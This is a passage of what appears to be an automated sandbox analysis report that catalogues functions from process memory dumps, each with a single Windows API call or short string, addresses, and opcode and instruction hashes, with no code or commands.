Opcode Fuzzy Hash: 2558e129099e267bfafcccc9b3548f9a19667aebb2f028736fda1eb086e071e1
Instruction Fuzzy Hash: CA01A271900600ABD310CF16DC46B26FBA4FB88B20F14811AED084B741D271F555CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004F05FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004F064E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: b4666be7ad2a51bc08a0532c171740a4584bcded9a5d0294207d6cc641998b3e
Instruction ID: 127b32451e7d8452e661d11711ad75ea20c677c8697231147b4653eb582ccade
Opcode Fuzzy Hash: b4666be7ad2a51bc08a0532c171740a4584bcded9a5d0294207d6cc641998b3e
Instruction Fuzzy Hash: 9F016271900601ABD310DF16DD46F26FBA4FB88B20F14815AED085B741D275F555CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0019AF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 0019AFEA

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2c08c7db869f85ef7add3617808ab2cdd52eaae09a1d62817af7678bacaf20ce
Instruction ID: 14868327eeaa2097478aeb3ddd98a4f073fe29642315a270b57442cafabaa9ba
Opcode Fuzzy Hash: 2c08c7db869f85ef7add3617808ab2cdd52eaae09a1d62817af7678bacaf20ce
Instruction Fuzzy Hash: 9B016271900601ABD310DF16DD46B26FBA4FB88A20F148159ED085B741D275F555CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0019BB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0019BBB9

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ab98c31d7b00a66a2db5de816116f4e1703762e1f90003c293d91e4801621efa
Instruction ID: f21922a80436da1fe9ba4bcb78c0260a63abec9d6030c65b3d58d5ab243aec09
Opcode Fuzzy Hash: ab98c31d7b00a66a2db5de816116f4e1703762e1f90003c293d91e4801621efa
Instruction Fuzzy Hash: C4017136504740DFEB208F15D985B65FBA0EF14320F08809ADD4A4B665D371A454DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019BAD6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0019BB0B

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c356d0233a4ccf57d57dfe1a634535b1c1f0cdaeb7c8c843942a295ca2348f38
Instruction ID: 3e6dbd62083e143edf2512ac8f3ff5984dbe6888bdd342eb1a99e921c7169271
Opcode Fuzzy Hash: c356d0233a4ccf57d57dfe1a634535b1c1f0cdaeb7c8c843942a295ca2348f38
Instruction Fuzzy Hash: D401A235604744DFEB208F15E985761FBA4EF04720F08C0AADD4A4B655D375A848DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0019A7BC

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 74923361662398e761cdec64bc0b5c540658157f8474ee00a59c324d33f0b858
Instruction ID: ae876b9af34fb0777b4bcb67ff0cdb59e6e1e06d6b9fa9ae21583b07274a0341
Opcode Fuzzy Hash: 74923361662398e761cdec64bc0b5c540658157f8474ee00a59c324d33f0b858
Instruction Fuzzy Hash: 1D01D175900340DFEF20CF55D886761FBE4EF00320F58C4AADE098B602D376A448CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019B806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0019B841

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 15220c65ef3fe5945a9662d8eb6cfaa239462502bc517a2b8d00f7aa36223c8d
Instruction ID: ae2f089b084c8dc219f8f00372b2e5386e7ce9d29b9da409b4fe5b10da590e54
Opcode Fuzzy Hash: 15220c65ef3fe5945a9662d8eb6cfaa239462502bc517a2b8d00f7aa36223c8d
Instruction Fuzzy Hash: 0B01AD31904740DFEF20CF06E984B61FBA4EF18720F08C09AEE490B622D371A458DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019B4AE, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0019B4E3

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: e8decbaf8198c1c33f8cfbae6714580d1a227e0204953c604092d51e24165b25
Instruction ID: 44493872c35197caf11d21f551ab74060f8d31bddda45595a7d514a4ce13779f
Opcode Fuzzy Hash: e8decbaf8198c1c33f8cfbae6714580d1a227e0204953c604092d51e24165b25
Instruction Fuzzy Hash: B4018C35904740DFEB20CF05E989B61FBA0EF55721F08C09ADE4A4B612D375A848DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019BE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0019BE70

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b57abba566eb8a6116035dd3c0803f1c4205d55a998c88ee57076c94a6dfdeb6
Instruction ID: 654f092d6b250cde28108b5a186861c45923abdbc33210d82d7db6056bf69b12
Opcode Fuzzy Hash: b57abba566eb8a6116035dd3c0803f1c4205d55a998c88ee57076c94a6dfdeb6
Instruction Fuzzy Hash: C5F0C235908744DFEF20CF05E9C57A1FBA4EF04721F08C0AADE494B312D3B5A848DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019A372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0019A3A4

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b57abba566eb8a6116035dd3c0803f1c4205d55a998c88ee57076c94a6dfdeb6
Instruction ID: c4f0fa043a1d93a29edd618f09a8fdf64b8bb54f0d72924d0c0d0d16342de8b5
Opcode Fuzzy Hash: b57abba566eb8a6116035dd3c0803f1c4205d55a998c88ee57076c94a6dfdeb6
Instruction Fuzzy Hash: 0BF0AF35900740DFEB20CF06D885B65FBA0EF04725F58C09ADD494B712D775A948DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019A4B6, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0019A4E5

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ff16b3480e69f419d27421271bd3b1d1f5ccc3268846a726accea74567e6ae87
Instruction ID: 26a1c23193012932f4ece3d726186575bda735cad22f661a696558990614f9fb
Opcode Fuzzy Hash: ff16b3480e69f419d27421271bd3b1d1f5ccc3268846a726accea74567e6ae87
Instruction Fuzzy Hash: C2F0C231500740DFEB10CF05D889761FB90EF01721F48C09ACE094B302E3B5A848DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 003C2148, Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

r*+, xrefs: 003C2387

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 40262b840f544018b644febc81e75e4f8a79594d87a59c5a6173a74c2de188f9
Instruction ID: 639187de4fe8915ca510a79a61bc5d096569162e6b0e75f42b83f3917baa5aca
Opcode Fuzzy Hash: 40262b840f544018b644febc81e75e4f8a79594d87a59c5a6173a74c2de188f9
Instruction Fuzzy Hash: B7716830A08209DFCB46DFA4C885BAEBBB5FB85300F2484AED446EB655DB349D41DB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C02E8, Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

:@lq, xrefs: 003C0537

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: :@lq
API String ID: 0-537014040
Opcode ID: ae077156c767367165d24121325757c174a3074c95cef579c12498302bfe7ad1
Instruction ID: adbddee7ac50a60dc557c6f5e6163a2e80de86bfcd6e5adefca2b80831ae1562
Opcode Fuzzy Hash: ae077156c767367165d24121325757c174a3074c95cef579c12498302bfe7ad1
Instruction Fuzzy Hash: F6519E34A05285CFDB09DF68C554B6DBBF2AF8A310F2484ADD506EB791DB319C01CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003CBD48, Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

r, xrefs: 003CBEC4

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: b2ee7b1eb49f59c265119573260fae9730dcbe2e21e3e55cb571d286f9302b02
Instruction ID: 3feedf81232fb406ec8b5ea862f769690805b8ef5fd480fccad7ebf17da4e09f
Opcode Fuzzy Hash: b2ee7b1eb49f59c265119573260fae9730dcbe2e21e3e55cb571d286f9302b02
Instruction Fuzzy Hash: 22516A70A00616CFCB09CF69D884AAAF7B2FF54300F558669D6169BA91C770FC96CF84

Uniqueness

Uniqueness Score: -1.00%

Function 003CF500, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

R]qq, xrefs: 003CF55A

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: R]qq
API String ID: 0-889367755
Opcode ID: fe2e7a3c3eb1f6f3bb59d77a251579b223393867690d29503f4c1d6d468ee54c
Instruction ID: 8e6c81bd44bbab3a6179a1eb6005995e1a603a935e9a6fd0457f70c81786c2ba
Opcode Fuzzy Hash: fe2e7a3c3eb1f6f3bb59d77a251579b223393867690d29503f4c1d6d468ee54c
Instruction Fuzzy Hash: 7531BF71A04249CFDB02DF64D800BEEBBB6AF86300F1185BBC245DB652E6308D49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C8780, Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

xE[, xrefs: 003C8803

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: xE[
API String ID: 0-3558134726
Opcode ID: 732da7d1dec6b9b8b3c2633985e87920bdd341fcc4fe07a44e298a6da9aa19e5
Instruction ID: 9c040066e434c48dca550839258c2e95b1982caddeefd22ffc0eceeddbe5a16e
Opcode Fuzzy Hash: 732da7d1dec6b9b8b3c2633985e87920bdd341fcc4fe07a44e298a6da9aa19e5
Instruction Fuzzy Hash: B931C030B04300DFC759AB78E89496D3BA6EB853003A8816DE006DB796DF35AD05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 003C8930, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

T0[, xrefs: 003C894B

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: T0[
API String ID: 0-3071009265
Opcode ID: c24b506aa068ddb1db2fa631a1c4dd94a9a30daec6b73459997ef056b875ae32
Instruction ID: 6264e089b633df9cda62829a11a3a6551da71c320665979bf0d0d7350de0dd7f
Opcode Fuzzy Hash: c24b506aa068ddb1db2fa631a1c4dd94a9a30daec6b73459997ef056b875ae32
Instruction Fuzzy Hash: FD312530A04209DFCB56DBA4C485BBDBBB4BB45300F2481AED402E7661DB355E45EB92

Uniqueness

Uniqueness Score: -1.00%

Function 003C8D26, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_qq, xrefs: 003C8E09

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _qq
API String ID: 0-943677416
Opcode ID: 196ef80d4acdfde4e4443b0136bb0714869e75067edc9c8eff46ccac9c274722
Instruction ID: 7176ac084ff9045454820d4e97079ba0b3792e65f6ddf06e6333761ba44ba970
Opcode Fuzzy Hash: 196ef80d4acdfde4e4443b0136bb0714869e75067edc9c8eff46ccac9c274722
Instruction Fuzzy Hash: BC31AF30E00349CFD760DF65C848B5AF7B2BF95304F55C62EC0159B664CBB4AA8ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C2656, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_qq, xrefs: 003C2739

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _qq
API String ID: 0-943677416
Opcode ID: 14be4e6f0dddc7a2d22008d5aacb2b0f40b5e3169935825bb669dbd010ca5b65
Instruction ID: 0756ab9c32efbdc48e9c5e5447273cad2f341afb2190b5f1c0788b7d2415eab5
Opcode Fuzzy Hash: 14be4e6f0dddc7a2d22008d5aacb2b0f40b5e3169935825bb669dbd010ca5b65
Instruction Fuzzy Hash: D5318C30A0030ACBDB15DF65D844B9AF7F2BF86304F15C52ED014AB665DB749D89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 004F1170, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004F11DC

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3e0d3f0a81ceb7224080825da500c4de7c650e0cca713a6b8e977cba3caddd15
Instruction ID: d34c131a5b6b13b3a2b9558767b18cd6e539cd2e31a993b20f685ef84729b1eb
Opcode Fuzzy Hash: 3e0d3f0a81ceb7224080825da500c4de7c650e0cca713a6b8e977cba3caddd15
Instruction Fuzzy Hash: BB21A1725093C09FDB12CB25DC55B92BFA4AF13324F0980DBED859F663D2659908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F01F4, Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004F0264

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f4fdfef0bca0d547d19cb9584d956a685e92a0e50e7a9920d47a683b38771c33
Instruction ID: 732402ec2451e659154659ccb8104e36770580d7451b2a3f720c270ed51657af
Opcode Fuzzy Hash: f4fdfef0bca0d547d19cb9584d956a685e92a0e50e7a9920d47a683b38771c33
Instruction Fuzzy Hash: 8C21D5B19053849FD712CF54DD89B92BFA8EF42324F0984EBED849B653D3349804DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003CCB68, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

5[, xrefs: 003CCB9C

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: 5[
API String ID: 0-3132743254
Opcode ID: dccccacda422ebfcea0d540c853871f001e4f78d4be5dd35de8ab586a6af8928
Instruction ID: 4b2be9f898a72ac1e85ee56104326a3e813e228aac88abeec475205ccac4c604
Opcode Fuzzy Hash: dccccacda422ebfcea0d540c853871f001e4f78d4be5dd35de8ab586a6af8928
Instruction Fuzzy Hash: 7E11BC30318640DBC715A778D102A6ABBDAAF92344764886DE04FEBB91DF32FC039795

Uniqueness

Uniqueness Score: -1.00%

Function 003C58E0, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

_/, xrefs: 003C58E0

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _/
API String ID: 0-3609947709
Opcode ID: f1727e80325f1fa3b90d6fe3853229e647e2be54fe70345dbca3443c42cef369
Instruction ID: fafa6b80f9b63aeb2d405bdc244fb43beda70a982a52dbada9f28c0972f790ad
Opcode Fuzzy Hash: f1727e80325f1fa3b90d6fe3853229e647e2be54fe70345dbca3443c42cef369
Instruction Fuzzy Hash: AD118F30A15209CFC701EFB4D841BAE7BB6AB45350F6081BED505DB246D736AD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C5148, Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

\/, xrefs: 003C5148

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: \/
API String ID: 0-4228267518
Opcode ID: bde8f9f9fdcbbe5b911c798fb944978a1b4aea5f7e3007b7de6e510403c3a3b7
Instruction ID: ac1a4f2b4bea5780f65da382ebad5b51945c832056bc67a9612407365b74a5c3
Opcode Fuzzy Hash: bde8f9f9fdcbbe5b911c798fb944978a1b4aea5f7e3007b7de6e510403c3a3b7
Instruction Fuzzy Hash: 1201D631A04615DFCB51EB785452BAF7BF5AB44340B54807EC506E7682E7319D81C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 003CC749, Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

s[, xrefs: 003CC7A3

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: s[
API String ID: 0-479868629
Opcode ID: bbe2b0ab275bbeaaf8accf83264cfb032fd5bfb507a6df946d352431f1af9e55
Instruction ID: 2e871e71fdb3444e8adf9f3d8577c5bb47180bde7ab94bec47b2d22f34202cea
Opcode Fuzzy Hash: bbe2b0ab275bbeaaf8accf83264cfb032fd5bfb507a6df946d352431f1af9e55
Instruction Fuzzy Hash: 6B01F9307243909FC702A734B894B693BE2EBC9710F2901BDE007DB6A6D7745C85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004F0232, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004F0264

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 731a0d3b1593cdc1e32aa744459747229b2fb458a5819e2e1bec32e9cd351091
Instruction ID: 230a88930b7230e14380185ba988dee71a27f9de5a0f262ed20fad7b45e615dd
Opcode Fuzzy Hash: 731a0d3b1593cdc1e32aa744459747229b2fb458a5819e2e1bec32e9cd351091
Instruction Fuzzy Hash: 01018F75900344DFEB20CF15DD897A6FB94EF81320F08C4ABDE498B742D679E844DA66

Uniqueness

Uniqueness Score: -1.00%

Function 004F11AA, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 004F11DC

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d18ba1e2fc1dc1e575dbbcdcfe889a7f294f747f8d967b19c39e924048217ad8
Instruction ID: 8f407e77a15ca330731bbbed44033d788cdd80ea0086ef2bb0366e236f966839
Opcode Fuzzy Hash: d18ba1e2fc1dc1e575dbbcdcfe889a7f294f747f8d967b19c39e924048217ad8
Instruction Fuzzy Hash: A001DF71A00344CFEB10CF59DD85BA2FBA4EF04320F08C0ABDE099B752D275A844DB66

Uniqueness

Uniqueness Score: -1.00%

Function 003CA370, Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

(@[, xrefs: 003CA38D

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: (@[
API String ID: 0-3319728435
Opcode ID: cfee88dc62cbaac01357a2c60ccd6e7ebc4a89c7cb0c96023fa16ccaac8060cb
Instruction ID: 9681ea52f0234aa5fc7597dd95bfb502a5741a83870975508d59cd8bf7b2ca06
Opcode Fuzzy Hash: cfee88dc62cbaac01357a2c60ccd6e7ebc4a89c7cb0c96023fa16ccaac8060cb
Instruction Fuzzy Hash: A1F0A732704204DB8754A728E4145BD77E6EBC6354368853DE10ADB751DF36EC069B82

Uniqueness

Uniqueness Score: -1.00%

Function 003C9480, Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

p>[, xrefs: 003C9489

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: p>[
API String ID: 0-382476867
Opcode ID: e02c726365caf3cdb180a0bfc8675ba9b59f22dbb65e4adfcf335164a5f7b7ac
Instruction ID: da6f2acb1b10ae8ca420c077ce01bf147edd7f2b24e393a238c2ecb0377b8505
Opcode Fuzzy Hash: e02c726365caf3cdb180a0bfc8675ba9b59f22dbb65e4adfcf335164a5f7b7ac
Instruction Fuzzy Hash: FCD05E31204145EBCB08EB74D495BA87BE9AF413417ADC41EE086C7905DB35E946E712

Uniqueness

Uniqueness Score: -1.00%

Function 003C65B0, Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

g/, xrefs: 003C65B0

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: g/
API String ID: 0-3233075910
Opcode ID: c143a405b8066374b2d5cc20c9b0dd43d4ab8d2fc7cf2e4cd278f6e6bddc9b02
Instruction ID: 3aa89a39dc7a5323a662f799d89224710ead2743c1338061e1bb6024763ec21d
Opcode Fuzzy Hash: c143a405b8066374b2d5cc20c9b0dd43d4ab8d2fc7cf2e4cd278f6e6bddc9b02
Instruction Fuzzy Hash: 63C0921180D2C18FDB42AB30AC2D6A03FB0DF03205B0984E688D48B4B3A516999EC723

Uniqueness

Uniqueness Score: -1.00%

Function 003C12E8, Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f323c98a6e267010492e871d9e9bc7c6b24692f91a3e3076b85caf3c4edc2a
Instruction ID: 04e31acfe3abf4976dfbaebf8e4e1947b60537d3f3c84186fa2f69e372d04e4b
Opcode Fuzzy Hash: 19f323c98a6e267010492e871d9e9bc7c6b24692f91a3e3076b85caf3c4edc2a
Instruction Fuzzy Hash: 2C22EE34A00605CFCB25EF24C480A6AB7F2BF89300B64C5AED85A9B756DB35ED85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003CE650, Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8c306bf0dede4f2d1f7701635911b92d4cdcffaca7d67b7118fdb95d337027
Instruction ID: 6fbd84cb8074308075d583d57f8cab0a28793aeef35f77294030b6a0b93800bd
Opcode Fuzzy Hash: 3d8c306bf0dede4f2d1f7701635911b92d4cdcffaca7d67b7118fdb95d337027
Instruction Fuzzy Hash: 53B18B31A04710CFDB2ADF69C984B6ABBF6AF84300F25846EE446DB691D738EC41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 003C4F08, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 006a065a34f6ad7c2d15aa3d0f3528134c0268643b4e5944f16051d37ec3d646
Instruction ID: 2f0759d1bdbb3dc8f561999c1956c3658bf18c6ccbdd00c605bff2081fb5cc19
Opcode Fuzzy Hash: 006a065a34f6ad7c2d15aa3d0f3528134c0268643b4e5944f16051d37ec3d646
Instruction Fuzzy Hash: 4761CF30604615CFCB02EB78D4A0E7E77A6EB85300BA4C96ED446CB65BDB35AC81D792

Uniqueness

Uniqueness Score: -1.00%

Function 003C09A0, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328cf5301fc461e18dd584945da56de1d548d87ca87dfe4194838fa357aeef29
Instruction ID: af923b8562c63ac132ae8f3aaaa35f0741047abcee2837a9cb0ae42ed43ce600
Opcode Fuzzy Hash: 328cf5301fc461e18dd584945da56de1d548d87ca87dfe4194838fa357aeef29
Instruction Fuzzy Hash: A051D231B04356DFCB09EBA4C850BAEB7B6BF85304F208669E446DB650DB30ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003CF338, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fac4b1a5c5bced6bc69e6fe946acac3a0507bf19f044c526ce90bd57f93ff05
Instruction ID: aee47070f33a9cdeca3496ed1680344e71583d66fb778d778684d5ab1dea4641
Opcode Fuzzy Hash: 6fac4b1a5c5bced6bc69e6fe946acac3a0507bf19f044c526ce90bd57f93ff05
Instruction Fuzzy Hash: 4B517031A00219DFCF1ADF94D840AAEB7BBBF85310B158479E906EB255DB31AD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C77E0, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca201bfc460b40c200d0df1b99309bbe69aa3083381a015e19b1a440dbd3c602
Instruction ID: d412c4a271dd6d63131624d61a1e17841b4b52263d94106af66de249008db659
Opcode Fuzzy Hash: ca201bfc460b40c200d0df1b99309bbe69aa3083381a015e19b1a440dbd3c602
Instruction Fuzzy Hash: D241143190465ACBDF11CF24C854BDAB7B6AF89304F518598DA09BB255DB70BF8ACF80

Uniqueness

Uniqueness Score: -1.00%

Function 003C7420, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8695152c235364e48bc3182f52d76d079d0d06d127f5409f64677b385a396551
Instruction ID: 5d2e519c767dc450c350a634e3b3b0405bfc40b936c2cc8e7e27dcde2c7580a1
Opcode Fuzzy Hash: 8695152c235364e48bc3182f52d76d079d0d06d127f5409f64677b385a396551
Instruction Fuzzy Hash: 21514031F042198BCB19EBB9C450AAEB7F7AFC9300B258529D409EB345DF75AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C8388, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0921611464a0215b661340aa4551c7676731eb23914e1bf49e1e8925e94d96
Instruction ID: 9c7c13f71230623b1b5865c4b462df920575799b58cb3986af428c310e28a77f
Opcode Fuzzy Hash: cb0921611464a0215b661340aa4551c7676731eb23914e1bf49e1e8925e94d96
Instruction Fuzzy Hash: 0551BD35A00116DFC71ACBA8C884FAEF7B1FB85314F25856ED416DB681CB31AE46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C1485, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

